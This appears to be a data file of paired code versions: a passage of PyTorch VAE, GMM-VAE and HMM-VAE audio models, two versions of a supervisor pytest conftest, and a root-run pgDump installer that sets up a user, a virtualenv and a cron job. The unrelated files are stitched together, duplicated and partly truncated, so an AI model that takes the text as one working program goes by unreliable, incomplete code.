h_true_given_pred = -np.sum(p_true_pred * np.log(np.maximum(p_true_given_pred, 1e-12)))
nmi = (h_true - h_true_given_pred) / h_true
summary['scalars']['nmi'] = nmi
prediction_mapping = np.argmax(contingency_matrix, axis=0)
predictions = prediction_mapping[predictions]
summary['scalars']['accuracy'] = np.mean(predictions == labels)
summary = super().modify_summary(summary)
return summary
@classmethod
def finalize_dogmatic_config(cls, config):
super().finalize_dogmatic_config(config)
if config['decoder']['factory'] == HybridCNNTranspose:
config['gmm'] = {
'factory': GMM,
'feature_size': config['decoder']['cnn_transpose_1d']['in_channels']
}
elif config['decoder']['factory'] == CNNTranspose1d:
config['gmm'] = {
'factory': GMM,
'feature_size': config['decoder']['in_channels']
}
class HMMVAE(GMMVAE):
"""
>>> config = HMMVAE.get_config(dict(\
encoder=dict(\
factory=HybridCNN,\
input_size=80,\
cnn_2d=dict(\
in_channels=1, out_channels=3*[32], kernel_size=3, \
), \
cnn_1d=dict(\
out_channels=3*[32], kernel_size=3\
),\
),\
decoder=dict(cnn_transpose_1d=dict(in_channels=16)),\
hmm=dict(num_units=10, viterbi_training=True, final_state=True, initial_state=True),\
feature_extractor=dict(\
factory=NormalizedLogMelExtractor,\
sample_rate=16000,\
fft_length=512,\
n_mels=80,\
),\
))
>>> config['encoder']['cnn_1d']['in_channels']
2560
>>> config['encoder']['cnn_1d']['out_channels']
[32, 32, 32]
>>> config['decoder']['cnn_transpose_1d']['in_channels']
16
>>> hmmvae = HMMVAE.from_config(config)
>>> inputs = {'stft': torch.rand((4, 1, 100, 257, 2)), 'seq_len': None}
>>> outputs = hmmvae(inputs)
>>> outputs[0][0].shape
torch.Size([4, 1, 80, 100])
>>> outputs[0][1].shape
torch.Size([4, 1, 80, 100])
>>> outputs[1][0][0].shape
torch.Size([4, 16, 100])
>>> outputs[1][0][1].shape
torch.Size([4, 16, 100])
>>> outputs[2][0].shape
torch.Size([4, 100, 30])
>>> outputs[2][1].shape
torch.Size([4, 30, 30])
>>> outputs[2][2].shape
torch.Size([4, 100, 30])
>>> review = hmmvae.review(inputs, outputs)
"""
def __init__(
self, encoder: HybridCNN, decoder: HybridCNNTranspose, hmm: HMM, *,
feature_key='stft', feature_extractor=None, feature_size=None,
label_key=None, supervised=False,
):
super(GMMVAE, self).__init__(
encoder=encoder, decoder=decoder,
feature_key=feature_key, feature_extractor=feature_extractor,
feature_size=feature_size,
)
self.hmm = hmm
self.label_key = label_key
self.supervised = supervised
def forward(self, inputs):
(x, x_hat), ((mu, log_var), seq_len) = super(GMMVAE, self).forward(inputs)
qz = Normal(
loc=mu.permute((0, 2, 1)),
scale=torch.exp(0.5 * log_var.permute((0, 2, 1)))
)
unit_sequence = inputs[self.label_key] if (self.supervised and self.training) else None
no_onset = inputs['no_onset'] if 'no_onset' in inputs else False
no_offset = inputs['no_offset'] if 'no_offset' in inputs else False
class_posterior, transitions, log_rho = self.hmm(
qz, seq_len=seq_len, unit_sequence=unit_sequence,
no_onset=no_onset, no_offset=no_offset
)
return (x, x_hat), ((mu, log_var), seq_len), (class_posterior, transitions, log_rho)
def review(self, inputs, outputs):
review = super(GMMVAE, self).review(inputs, outputs)
_, (params, seq_len), (class_posterior, transitions, log_rho) = outputs
kld = -(class_posterior * log_rho).sum(-1)
kld = Mean(axis=-1)(kld, seq_len)
log_class_probs = torch.max(self.hmm.log_class_probs, -100 * torch.ones_like(self.hmm.log_class_probs))
log_transition_mat = torch.max(self.hmm.log_transition_mat, -100 * torch.ones_like(self.hmm.log_transition_mat))
class_ce = -(class_posterior[:, 0] * log_class_probs).sum(-1) - (transitions*log_transition_mat).sum((1,2))
class_ce = class_ce / (transitions.sum((1, 2)) + 1)
max_class_posterior, classes = torch.max(class_posterior, -1)
review['losses'].update(dict(
kld=kld.mean(),
class_ce=class_ce.mean(),
log_class_prob=log_class_probs.sum(),
))
review['scalars'] = dict(
classes=classes.flatten()//self.hmm.states_per_unit,
)
review['histograms'].update(dict(
kld_=kld.flatten(),
log_class_probs_=log_class_probs.flatten(),
max_class_posterior_=max_class_posterior.flatten(),
classes_=classes.flatten()
))
if self.label_key is not None:
labels = inputs[self.label_key]
review['scalars'].update(dict(
labels=labels.flatten()
))
return review
@classmethod
def finalize_dogmatic_config(cls, config):
super(GMMVAE, cls).finalize_dogmatic_config(config)
if config['decoder']['factory'] == HybridCNNTranspose:
config['hmm'] = {
'factory': HMM,
'feature_size': config['decoder']['cnn_transpose_1d']['in_channels']
}
elif config['decoder']['factory'] == CNNTranspose1d:
config['hmm'] = {
'factory': HMM,
'feature_size': config['decoder']['in_channels']
}
| import numpy as np
import torch
from einops import rearrange
from padertorch.base import Model
from padertorch.contrib.je.modules.conv import CNN1d, CNNTranspose1d
from padertorch.contrib.je.modules.gmm import GMM
from padertorch.contrib.je.modules.hmm import HMM
from padertorch.contrib.je.modules.features import NormalizedLogMelExtractor
from padertorch.contrib.je.modules.global_pooling import Mean
from padertorch.contrib.je.modules.hybrid import HybridCNN, HybridCNNTranspose
from sklearn import metrics
from torch.distributions import Normal
from torchvision.utils import make_grid
class VAE(Model):
"""
>>> config = VAE.get_config(dict(\
encoder=dict(\
factory=HybridCNN,\
input_size=80,\
cnn_2d=dict(\
in_channels=1, out_channels=3*[32], kernel_size=3, \
), \
cnn_1d=dict(\
out_channels=3*[32], kernel_size=3\
),\
),\
feature_extractor=dict(\
sample_rate=16000,\
fft_length=512,\
n_mels=80,\
),\
))
>>> config['encoder']['cnn_1d']['in_channels']
2560
>>> config['encoder']['cnn_1d']['out_channels']
[32, 32, 32]
>>> config['decoder']['cnn_transpose_1d']['in_channels']
16
>>> vae = VAE.from_config(config)
>>> inputs = {'stft': torch.zeros((4, 1, 100, 257, 2)), 'seq_len': None}
>>> outputs = vae(inputs)
>>> outputs[0][0].shape
torch.Size([4, 1, 80, 100])
>>> outputs[0][1].shape
torch.Size([4, 1, 80, 100])
>>> outputs[1][0][0].shape
torch.Size([4, 16, 100])
>>> outputs[1][0][1].shape
torch.Size([4, 16, 100])
>>> review = vae.review(inputs, outputs)
"""
def __init__(
self, encoder: HybridCNN, decoder: HybridCNNTranspose, *,
feature_key='stft', feature_extractor=None, feature_size=None,
):
super().__init__()
# allow joint optimization of encoder and decoder
self.encoder = encoder
self.decoder = decoder
self.feature_key = feature_key
self.feature_extractor = feature_extractor
self.feature_size = feature_size
self.n_params = 2
def encode(self, x, seq_len=None):
if isinstance(self.encoder, CNN1d):
x = rearrange(x, 'b c f t -> b (c f) t')
if self.encoder.return_pool_indices:
h, seq_len, pool_indices = self.encoder(x, seq_len=seq_len)
else:
h, seq_len = self.encoder(x, seq_len=seq_len)
pool_indices = None
assert not h.shape[1] % self.n_params
params = tuple(torch.split(h, h.shape[1] // self.n_params, dim=1))
return params, seq_len, pool_indices
def reparameterize(self, params):
mu, logvar = params[:2]
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return eps * std + mu
else:
return mu
def decode(self, z, seq_len=None, shapes=None, lengths=None, pool_indices=None):
x_hat, seq_len = self.decoder(
z, seq_len=seq_len, shapes=shapes, seq_lens=lengths, pool_indices=pool_indices
)
if x_hat.dim() == 3:
b, f, t = x_hat.shape
x_hat = x_hat.view((b, -1, self.feature_size, t))
return x_hat, seq_len # (B, C, F, T)
def forward(self, inputs):
x_target = inputs[self.feature_key]
seq_len = inputs['seq_len']
if self.feature_extractor is not None:
x_target = self.feature_extractor(x_target, seq_len)
params, seq_len, pool_indices = self.encode(x_target, seq_len)
x_shape = x_target.shape
if isinstance(self.encoder, CNN1d):
x_shape = (x_shape[0], x_shape[1]*x_shape[2], x_shape[3])
shapes = self.encoder.get_shapes(x_shape)
if seq_len is None:
lengths = None
else:
lengths = self.encoder.get_seq_lens(seq_len)
z = self.reparameterize(params)
x_hat, _ = self.decode(
z, seq_len, shapes=shapes, lengths=lengths, pool_indices=pool_indices
)
return (x_target, x_hat), (params, seq_len)
def review(self, inputs, outputs):
# visualization
(x_target, *x_hats), (params, seq_len), *_ = outputs
(mu, log_var) = params[:2]
kld = -0.5 * (1 + log_var - mu.pow(2) - log_var.exp()).sum(dim=1)
kld = Mean(axis=-1)(kld, seq_len)
mu = mu.contiguous()
review = dict(
losses=dict(
kld=kld.mean(),
),
histograms=dict(
kld_=kld.flatten(),
mu_=mu.flatten(),
log_var_=log_var.flatten(),
),
images=dict(
targets=x_target[:3, :1],
latents=mu[:3],
)
)
seq_len = inputs['seq_len']
for i, x_hat in enumerate(x_hats):
mse = (x_hat - x_target).pow(2).sum(dim=(1, 2))
mse = Mean(axis=-1)(mse, seq_len)
review['losses'][f'rec{i}'] = mse.mean()
review['histograms'][f'rec{i}_'] = mse
review['images'][f'x_hat_{i}_'] = x_hat.contiguous()[:3, :1]
return review
def modify_summary(self, summary):
summary = super().modify_summary(summary)
for key, image in summary['images'].items():
if image.dim() == 3:
image = image.unsqueeze(1)
summary['images'][key] = make_grid(
image.flip(2), normalize=True, scale_each=False, nrow=1
)
return summary
@classmethod
def finalize_dogmatic_config(cls, config):
config['encoder']['factory'] = CNN1d
config['feature_extractor'] = {
'factory': NormalizedLogMelExtractor,
}
in_channels = None
if config['feature_extractor'] is not None:
if config['feature_extractor']['factory'] == NormalizedLogMelExtractor:
config['feature_size'] = config['feature_extractor']['n_mels']
in_channels = 1 + config['feature_extractor']['add_deltas']+config['feature_extractor']['add_delta_deltas']
feature_size = config['feature_size']
if config['encoder']['factory'] == HybridCNN:
if feature_size is not None:
config['encoder'].update({
'input_size': feature_size,
})
if in_channels is not None:
config['encoder']['cnn_2d']['in_channels'] = in_channels
content_emb_dim = config['encoder']['cnn_1d']['out_channels'][-1] // 2
elif config['encoder']['factory'] == CNN1d:
if feature_size is not None and in_channels is not None:
config['encoder']['in_channels'] = feature_size * in_channels
content_emb_dim = config['encoder']['out_channels'][-1] // 2
else:
raise ValueError(f'Factory {config["encoder"]["factory"]} not allowed.')
config['decoder'] = config['encoder']['factory'].get_transpose_config(config['encoder'])
if config['decoder']['factory'] == HybridCNNTranspose:
config['decoder']['cnn_transpose_1d']['in_channels'] = content_emb_dim
elif config['decoder']['factory'] == CNNTranspose1d:
config['decoder']['in_channels'] = content_emb_dim
else:
raise ValueError(f'Factory {config["decoder"]["factory"]} not allowed.')
class GMMVAE(VAE):
"""
>>> config = GMMVAE.get_config(dict(\
encoder=dict(\
factory=HybridCNN,\
input_size=80,\
cnn_2d=dict(\
in_channels=1, out_channels=3*[32], kernel_size=3, \
), \
cnn_1d=dict(\
out_channels=3*[32], kernel_size=3\
),\
),\
decoder=dict(cnn_transpose_1d=dict(in_channels=16)),\
gmm=dict(num_classes=10),\
feature_extractor=dict(\
factory=NormalizedLogMelExtractor,\
sample_rate=16000,\
fft_length=512,\
n_mels=80,\
),\
))
>>> config['encoder']['cnn_1d']['in_channels']
2560
>>> config['encoder']['cnn_1d']['out_channels']
[32, 32, 32]
>>> config['decoder']['cnn_transpose_1d']['in_channels']
16
>>> gmmvae = GMMVAE.from_config(config)
>>> inputs = {'stft': torch.zeros((4, 1, 100, 257, 2)), 'seq_len': None, 'labels': torch.Tensor([1,2,3,4]).long()}
>>> outputs = gmmvae(inputs)
>>> outputs[0][0].shape
torch.Size([4, 1, 80, 100])
>>> outputs[0][1].shape
torch.Size([4, 1, 80, 100])
>>> outputs[1][0][0].shape
torch.Size([4, 16, 100])
>>> outputs[1][0][1].shape
torch.Size([4, 16, 100])
>>> outputs[2][0].shape
torch.Size([4, 100, 10])
>>> outputs[2][1].shape
torch.Size([4, 100, 10])
>>> review = gmmvae.review(inputs, outputs)
>>> gmmvae.supervised = True
>>> gmmvae.label_key = 'labels'
>>> outputs = gmmvae(inputs)
>>> review = gmmvae.review(inputs, outputs)
"""
def __init__(
self, encoder: HybridCNN, decoder: HybridCNNTranspose, gmm: GMM, *,
feature_key='stft', feature_extractor=None, feature_size=None,
label_key=None, supervised=False,
):
super().__init__(
encoder=encoder, decoder=decoder,
feature_key=feature_key, feature_extractor=feature_extractor,
feature_size=feature_size,
)
self.gmm = gmm
self.label_key = label_key
self.supervised = supervised
def forward(self, inputs):
(x, x_hat), ((mu, log_var), seq_len) = super().forward(inputs)
qz = Normal(
loc=rearrange(mu, 'b d t -> b t d'),
scale=torch.exp(0.5 * rearrange(log_var, 'b d t -> b t d'))
)
log_class_posterior, log_rho = self.gmm(qz)
return (x, x_hat), ((mu, log_var), seq_len), (log_class_posterior, log_rho)
def review(self, inputs, outputs):
review = super().review(inputs, outputs)
_, (params, seq_len), (log_class_posterior, log_rho) = outputs
class_labels = inputs[self.label_key] if self.supervised else None
class_posterior = log_class_posterior.exp().detach()
if class_labels is None:
kld = -(class_posterior * log_rho).sum(-1)
class_ce = -(class_posterior * self.gmm.log_class_probs).sum(-1)
else:
if class_labels.dim() < 2:
class_labels = class_labels[:, None]
class_labels = class_labels.expand(log_rho.shape[:2])
kld = -log_rho.gather(-1, class_labels[..., None]).squeeze(-1)
class_ce = -self.gmm.log_class_probs[class_labels]
kld = Mean(axis=-1)(kld, seq_len)
class_ce = Mean(axis=-1)(class_ce, seq_len)
max_class_posterior, classes = torch.max(
torch.exp(log_class_posterior), -1
)
review['losses'].update(dict(
kld=kld.mean(),
class_ce=class_ce.mean(),
log_class_prob=self.gmm.log_class_probs.sum()
))
review['scalars'] = dict(
classes=classes.flatten(),
)
if self.label_key is not None:
labels = inputs[self.label_key]
review['scalars'].update(dict(
labels=labels.flatten()
))
review['histograms'].update(dict(
kld_=kld.flatten(),
log_class_probs_=self.gmm.log_class_probs.flatten(),
max_class_posterior_=max_class_posterior.flatten(),
classes_=classes.flatten()
))
return review
def modify_summary(self, summary):
predictions = summary['scalars'].pop('classes', None)
if predictions is not None:
summary['scalars']['n_classes'] = len(np.unique(predictions))
labels = summary['scalars'].pop('labels', None)
if predictions is not None and labels is not None:
_, labels = np.unique(labels, return_inverse=True)
_, predictions = np.unique(predictions, return_inverse=True)
contingency_matrix = metrics.cluster.contingency_matrix(
labels, predictions
)
p_true_pred = contingency_matrix / contingency_matrix.sum()
p_true = p_true_pred.sum(axis=1, keepdims=True)
p_true_given_pred = contingency_matrix / np.maximum(contingency_matrix.sum(axis=0, keepdims=True), 1)
h_true = -np.sum(p_true * np.log(np.maximum(p_true, 1e-12)))
h_true_given_pred = -np.sum(p_true_pred * np.log(np.maximum(p_true_given_pred, 1e-12)))
nmi = (h_true - h_true_given_pred) / h_true
summary['scalars']['nmi'] = nmi
prediction_mapping = np.argmax(contingency_matrix, axis=0)
predictions = prediction_mapping[predictions]
summary['scalars']['accuracy'] = np.mean(predictions == labels)
summary = super().modify_summary(summary)
return summary
@classmethod
def finalize_dogmatic_config(cls, config):
super().finalize_dogmatic_config(config)
if config['decoder']['factory'] == HybridCNNTranspose:
config['gmm'] = {
'factory': GMM,
'feature_size': config['decoder']['cnn_transpose_1d']['in_channels']
}
elif config['decoder']['factory'] == CNNTranspose1d:
config['gmm'] = {
'factory': GMM,
'feature_size': config['decoder']['in_channels']
}
class HMMVAE(GMMVAE):
"""
>>> config = HMMVAE.get_config(dict(\
encoder=dict(\
factory=HybridCNN,\
input_size=80,\
cnn_2d=dict(\
in_channels=1, out_channels=3*[32], kernel_size=3, \
), \
cnn_1d=dict(\
out_channels=3*[32], kernel_size=3\
),\
),\
decoder=dict(cnn_transpose_1d=dict(in_channels=16)),\
hmm=dict(num_units=10, viterbi_training=True, final_state=True, initial_state=True),\
feature_extractor=dict(\
factory=NormalizedLogMelExtractor,\
sample_rate=16000,\
fft_length=512,\
n_mels=80,\
),\
))
>>> config['encoder']['cnn_1d']['in_channels']
2560
>>> config['encoder']['cnn_1d']['out_channels']
[32, 32, 32]
>>> config['decoder']['cnn_transpose_1d']['in_channels']
16
>>> hmmvae = HMMVAE.from_config(config)
>>> inputs = {'stft': torch.rand((4, 1, 100, 257, 2)), 'seq_len': None}
>>> outputs = hmmvae(inputs)
>>> outputs[0][0].shape
torch.Size([4, 1, 80, 100])
>>> outputs[0][1].shape
torch.Size([4, 1, 80, 100])
>>> outputs[1][0][0].shape
torch.Size([4, 16, 100])
>>> outputs[1][0][1].shape
torch.Size([4, 16, 100])
>>> outputs[2][0].shape
torch.Size([4, 100, 30])
>>> outputs[2][1].shape
torch.Size([4, 30, 30])
>>> outputs[2][2].shape
torch.Size([4, 100, 30])
>>> review = hmmvae.review(inputs, outputs)
"""
def __init__(
self, encoder: HybridCNN, decoder: HybridCNNTranspose, hmm: HMM, *,
feature_key='stft', feature_extractor=None, feature_size=None,
label_key=None, supervised=False,
):
super(GMMVAE, self).__init__(
encoder=encoder, decoder=decoder,
feature_key=feature_key, feature_extractor=feature_extractor,
feature_size=feature_size,
)
self.hmm = hmm
self.label_key = label_key
self.supervised = supervised
def forward(self, inputs):
(x, x_hat), ((mu, log_var), seq_len) = super(GMMVAE, self).forward(inputs)
qz = Normal(
loc=mu.permute((0, 2, 1)),
scale=torch.exp(0.5 * log_var.permute((0, 2, 1)))
)
unit_sequence = inputs[self.label_key] if (self.supervised and self.training) else None
no_onset = inputs['no_onset'] if 'no_onset' in inputs else False
no_offset = inputs['no_offset'] if 'no_offset' in inputs else False
class_posterior, transitions, log_rho = self.hmm(
qz, seq_len=seq_len, unit_sequence=unit_sequence,
no_onset=no_onset, no_offset=no_offset
)
return (x, x_hat), ((mu, log_var), seq_len), (class_posterior, transitions, log_rho)
def review(self, inputs, outputs):
review = super(GMMVAE, self).review(inputs, outputs)
_, (params, seq_len), (class_posterior, transitions, log_rho) = outputs
kld = -(class_posterior * log_rho).sum(-1)
kld = Mean(axis=-1)(kld, seq_len)
log_class_probs = torch.max(self.hmm.log_class_probs, -100 * torch.ones_like(self.hmm.log_class_probs))
log_transition_mat = torch.max(self.hmm.log_transition_mat, -100 * torch.ones_like(self.hmm.log_transition_mat))
class_ce = -(class_posterior[:, 0] * log_class_probs).sum(-1) - (transitions*log_transition_mat).sum((1,2))
class_ce = class_ce / (transitions.sum((1, 2)) + 1)
max_class_posterior, classes = torch.max(class_posterior, -1)
review['losses'].update(dict(
kld=kld.mean(),
class_ce=class_ce.mean(),
log_class_prob=log_class_probs.sum(),
))
review['scalars'] = dict(
classes=classes.flatten()//self.hmm.states_per_unit,
)
review['histograms'].update(dict(
kld_=kld.flatten(),
log_class_probs_=log_class_probs.flatten(),
max_class_posterior_=max_class_posterior.flatten(),
classes_=classes.flatten()
))
if self.label_key is not None:
labels = inputs[self.label_key]
review['scalars'].update(dict(
labels=labels.flatten()
))
return review
@classmethod
def finalize_dogmatic_config(cls, config):
super(GMMVAE, cls).finalize_dogmatic_config(config)
if config['decoder']['factory'] == HybridCNNTranspose:
config['hmm'] = {
'factory': HMM,
'feature_size': config['decoder']['cnn_transpose_1d']['in_channels']
}
elif config['decoder']['factory'] == CNNTranspose1d:
config['hmm'] = {
'factory': HMM,
'feature_size': config['decoder']['in_channels']
}
|
"""Common test functions."""
from pathlib import Path
import re
from unittest.mock import AsyncMock, MagicMock, PropertyMock, patch
from uuid import uuid4
from aiohttp import web
from aiohttp.test_utils import TestClient
import pytest
from supervisor.api import RestAPI
from supervisor.bootstrap import initialize_coresys
from supervisor.coresys import CoreSys
from supervisor.dbus.network import NetworkManager
from supervisor.docker import DockerAPI
from supervisor.utils.gdbus import DBus
from tests.common import exists_fixture, load_fixture, load_json_fixture
# pylint: disable=redefined-outer-name, protected-access
@pytest.fixture
def docker() -> DockerAPI:
"""Mock DockerAPI."""
images = [MagicMock(tags=["openpeerpower/amd64-oppio-supervisor:latest"])]
with patch("docker.DockerClient", return_value=MagicMock()), patch(
"supervisor.docker.DockerAPI.images", return_value=MagicMock()
), patch("supervisor.docker.DockerAPI.containers", return_value=MagicMock()), patch(
"supervisor.docker.DockerAPI.api", return_value=MagicMock()
), patch(
"supervisor.docker.DockerAPI.images.list", return_value=images
), patch(
"supervisor.docker.DockerAPI.info",
return_value=MagicMock(),
), patch(
"supervisor.docker.DockerConfig",
return_value=MagicMock(),
):
docker_obj = DockerAPI()
docker_obj.info.logging = "journald"
docker_obj.info.storage = "overlay2"
docker_obj.info.version = "1.0.0"
docker_obj.config.registries = {}
yield docker_obj
@pytest.fixture
def dbus() -> DBus:
"""Mock DBUS."""
dbus_commands = []
async def mock_get_properties(dbus_obj, interface):
latest = dbus_obj.object_path.split("/")[-1]
fixture = interface.replace(".", "_")
if latest.isnumeric():
fixture = f"{fixture}_{latest}"
return load_json_fixture(f"{fixture}.json")
async def mock_wait_signal(_, __):
pass
async def mock_send(_, command, silent=False):
if silent:
return ""
fixture = command[6].replace("/", "_")[1:]
if command[1] == "introspect":
filetype = "xml"
if not exists_fixture(f"{fixture}.{filetype}"):
fixture = re.sub(r"_[0-9]+$", "", fixture)
# special case
if exists_fixture(f"{fixture}_*.{filetype}"):
fixture = f"{fixture}_*"
else:
fixture = f"{fixture}-{command[10].split(".")[-1]}"
filetype = "fixture"
dbus_commands.append(fixture)
return load_fixture(f"{fixture}.{filetype}")
with patch("supervisor.utils.gdbus.DBus._send", new=mock_send), patch(
"supervisor.utils.gdbus.DBus.wait_signal", new=mock_wait_signal
), patch(
"supervisor.dbus.interface.DBusInterface.is_connected",
return_value=True,
), patch(
"supervisor.utils.gdbus.DBus.get_properties", new=mock_get_properties
):
yield dbus_commands
@pytest.fixture
async def network_manager(dbus) -> NetworkManager:
"""Mock NetworkManager."""
nm_obj = NetworkManager()
nm_obj.dbus = dbus
# Init
await nm_obj.connect()
await nm_obj.update()
yield nm_obj
@pytest.fixture
async def coresys(loop, docker, network_manager, aiohttp_client) -> CoreSys:
"""Create a CoreSys Mock."""
with patch("supervisor.bootstrap.initialize_system_data"), patch(
"supervisor.bootstrap.setup_diagnostics"
), patch(
"supervisor.bootstrap.fetch_timezone",
return_value="Europe/Zurich",
), patch(
"aiohttp.ClientSession",
return_value=TestClient.session,
):
coresys_obj = await initialize_coresys()
# Mock save json
coresys_obj._ingress.save_data = MagicMock()
coresys_obj._auth.save_data = MagicMock()
coresys_obj._updater.save_data = MagicMock()
coresys_obj._config.save_data = MagicMock()
coresys_obj._jobs.save_data = MagicMock()
# Mock test client
coresys_obj.arch._default_arch = "amd64"
coresys_obj._machine = "qemux86-64"
coresys_obj._machine_id = uuid4()
# Mock host communication
coresys_obj._dbus._network = network_manager
# Mock docker
coresys_obj._docker = docker
# Set internet state
coresys_obj.supervisor._connectivity = True
coresys_obj.host.network._connectivity = True
yield coresys_obj
@pytest.fixture
def sys_machine():
"""Mock sys_machine."""
with patch("supervisor.coresys.CoreSys.machine", new_callable=PropertyMock) as mock:
yield mock
@pytest.fixture
def sys_supervisor():
"""Mock sys_supervisor."""
with patch(
"supervisor.coresys.CoreSys.supervisor", new_callable=PropertyMock
) as mock:
mock.return_value = MagicMock()
yield MagicMock
@pytest.fixture
async def api_client(aiohttp_client, coresys: CoreSys):
"""Fixture for RestAPI client."""
api = RestAPI(coresys)
api.webapp = web.Application()
api.start = AsyncMock()
await api.load()
yield await aiohttp_client(api.webapp)
@pytest.fixture
def store_manager(coresys: CoreSys):
"""Fixture for the store manager."""
sm_obj = coresys.store
with patch("supervisor.store.data.StoreData.update", return_value=MagicMock()):
yield sm_obj
@pytest.fixture
def run_dir(tmp_path):
"""Fixture to inject oppio env."""
with patch("supervisor.core.RUN_SUPERVISOR_STATE") as mock_run:
tmp_state = Path(tmp_path, "supervisor")
mock_run.write_text = tmp_state.write_text
yield tmp_state
| """Common test functions."""
from pathlib import Path
import re
from unittest.mock import AsyncMock, MagicMock, PropertyMock, patch
from uuid import uuid4
from aiohttp import web
from aiohttp.test_utils import TestClient
import pytest
from supervisor.api import RestAPI
from supervisor.bootstrap import initialize_coresys
from supervisor.coresys import CoreSys
from supervisor.dbus.network import NetworkManager
from supervisor.docker import DockerAPI
from supervisor.utils.gdbus import DBus
from tests.common import exists_fixture, load_fixture, load_json_fixture
# pylint: disable=redefined-outer-name, protected-access
@pytest.fixture
def docker() -> DockerAPI:
"""Mock DockerAPI."""
images = [MagicMock(tags=["openpeerpower/amd64-oppio-supervisor:latest"])]
with patch("docker.DockerClient", return_value=MagicMock()), patch(
"supervisor.docker.DockerAPI.images", return_value=MagicMock()
), patch("supervisor.docker.DockerAPI.containers", return_value=MagicMock()), patch(
"supervisor.docker.DockerAPI.api", return_value=MagicMock()
), patch(
"supervisor.docker.DockerAPI.images.list", return_value=images
), patch(
"supervisor.docker.DockerAPI.info",
return_value=MagicMock(),
), patch(
"supervisor.docker.DockerConfig",
return_value=MagicMock(),
):
docker_obj = DockerAPI()
docker_obj.info.logging = "journald"
docker_obj.info.storage = "overlay2"
docker_obj.info.version = "1.0.0"
docker_obj.config.registries = {}
yield docker_obj
@pytest.fixture
def dbus() -> DBus:
"""Mock DBUS."""
dbus_commands = []
async def mock_get_properties(dbus_obj, interface):
latest = dbus_obj.object_path.split("/")[-1]
fixture = interface.replace(".", "_")
if latest.isnumeric():
fixture = f"{fixture}_{latest}"
return load_json_fixture(f"{fixture}.json")
async def mock_wait_signal(_, __):
pass
async def mock_send(_, command, silent=False):
if silent:
return ""
fixture = command[6].replace("/", "_")[1:]
if command[1] == "introspect":
filetype = "xml"
if not exists_fixture(f"{fixture}.{filetype}"):
fixture = re.sub(r"_[0-9]+$", "", fixture)
# special case
if exists_fixture(f"{fixture}_*.{filetype}"):
fixture = f"{fixture}_*"
else:
fixture = f"{fixture}-{command[10].split('.')[-1]}"
filetype = "fixture"
dbus_commands.append(fixture)
return load_fixture(f"{fixture}.{filetype}")
with patch("supervisor.utils.gdbus.DBus._send", new=mock_send), patch(
"supervisor.utils.gdbus.DBus.wait_signal", new=mock_wait_signal
), patch(
"supervisor.dbus.interface.DBusInterface.is_connected",
return_value=True,
), patch(
"supervisor.utils.gdbus.DBus.get_properties", new=mock_get_properties
):
yield dbus_commands
@pytest.fixture
async def network_manager(dbus) -> NetworkManager:
"""Mock NetworkManager."""
nm_obj = NetworkManager()
nm_obj.dbus = dbus
# Init
await nm_obj.connect()
await nm_obj.update()
yield nm_obj
@pytest.fixture
async def coresys(loop, docker, network_manager, aiohttp_client) -> CoreSys:
"""Create a CoreSys Mock."""
with patch("supervisor.bootstrap.initialize_system_data"), patch(
"supervisor.bootstrap.setup_diagnostics"
), patch(
"supervisor.bootstrap.fetch_timezone",
return_value="Europe/Zurich",
), patch(
"aiohttp.ClientSession",
return_value=TestClient.session,
):
coresys_obj = await initialize_coresys()
# Mock save json
coresys_obj._ingress.save_data = MagicMock()
coresys_obj._auth.save_data = MagicMock()
coresys_obj._updater.save_data = MagicMock()
coresys_obj._config.save_data = MagicMock()
coresys_obj._jobs.save_data = MagicMock()
# Mock test client
coresys_obj.arch._default_arch = "amd64"
coresys_obj._machine = "qemux86-64"
coresys_obj._machine_id = uuid4()
# Mock host communication
coresys_obj._dbus._network = network_manager
# Mock docker
coresys_obj._docker = docker
# Set internet state
coresys_obj.supervisor._connectivity = True
coresys_obj.host.network._connectivity = True
yield coresys_obj
@pytest.fixture
def sys_machine():
"""Mock sys_machine."""
with patch("supervisor.coresys.CoreSys.machine", new_callable=PropertyMock) as mock:
yield mock
@pytest.fixture
def sys_supervisor():
"""Mock sys_supervisor."""
with patch(
"supervisor.coresys.CoreSys.supervisor", new_callable=PropertyMock
) as mock:
mock.return_value = MagicMock()
yield MagicMock
@pytest.fixture
async def api_client(aiohttp_client, coresys: CoreSys):
"""Fixture for RestAPI client."""
api = RestAPI(coresys)
api.webapp = web.Application()
api.start = AsyncMock()
await api.load()
yield await aiohttp_client(api.webapp)
@pytest.fixture
def store_manager(coresys: CoreSys):
"""Fixture for the store manager."""
sm_obj = coresys.store
with patch("supervisor.store.data.StoreData.update", return_value=MagicMock()):
yield sm_obj
@pytest.fixture
def run_dir(tmp_path):
"""Fixture to inject oppio env."""
with patch("supervisor.core.RUN_SUPERVISOR_STATE") as mock_run:
tmp_state = Path(tmp_path, "supervisor")
mock_run.write_text = tmp_state.write_text
yield tmp_state
|
from os import getuid, system, mkdir, popen, setuid, setgid
from pathlib import Path
def run_command(command: str):
status = system(command)
if status != 0:
exit(status)
if getuid() != 0:
print("You must run it as root")
exit(1)
if Path("/etc/debian_version").exists():
# Ubuntu/Debian
run_command("apt install -y cron python3-venv")
elif Path("/etc/system-release").exists():
# CentOS
run_command("dnf install -y crontabs")
else:
print("Your OS is not supported")
exit(1)
if not Path("/opt/pgDump/").exists():
mkdir("/opt/pgDump/")
run_command("groupadd -f pgDump")
if system("id -u pgDump") == 256:
run_command("useradd -g pgDump -G docker -b /opt/pgDump/ pgDump")
uid = int(popen("id -u pgDump").read())
gid = int(popen("id -g pgDump").read())
if Path("/opt/pgDump/venv").exists():
run_command("rm -r /opt/pgDump/venv")
run_command("python3 -m venv /opt/pgDump/venv; . /opt/pgDump/venv/bin/activate; pip install -r requirements.txt")
run_command("cp -r src/* /opt/pgDump/")
run_command(f"cp {"config.yml" if Path("config.yml").exists() else "config.sample.yml"} /opt/pgDump/config.yml")
run_command("chown -R pgDump:pgDump /opt/pgDump/")
setgid(gid)
setuid(uid)
system("crontab -l > /opt/pgDump/mycron")
try:
with Path("/opt/pgDump/mycron").open("r") as f:
if "pgDump" not in f.read():
with Path("/opt/pgDump/mycron").open("a") as file:
file.write("00 20 * * * /opt/pgDump/venv/bin/python /opt/pgDump/main.py >>/opt/pgDump/log 2>&1\n")
except FileNotFoundError:
with Path("/opt/pgDump/mycron").open("a") as file:
file.write("00 20 * * * /opt/pgDump/venv/bin/python /opt/pgDump/main.py\n")
run_command("crontab /opt/pgDump/mycron")
run_command("rm /opt/pgDump/mycron")
| from os import getuid, system, mkdir, popen, setuid, setgid
from pathlib import Path
def run_command(command: str):
status = system(command)
if status != 0:
exit(status)
if getuid() != 0:
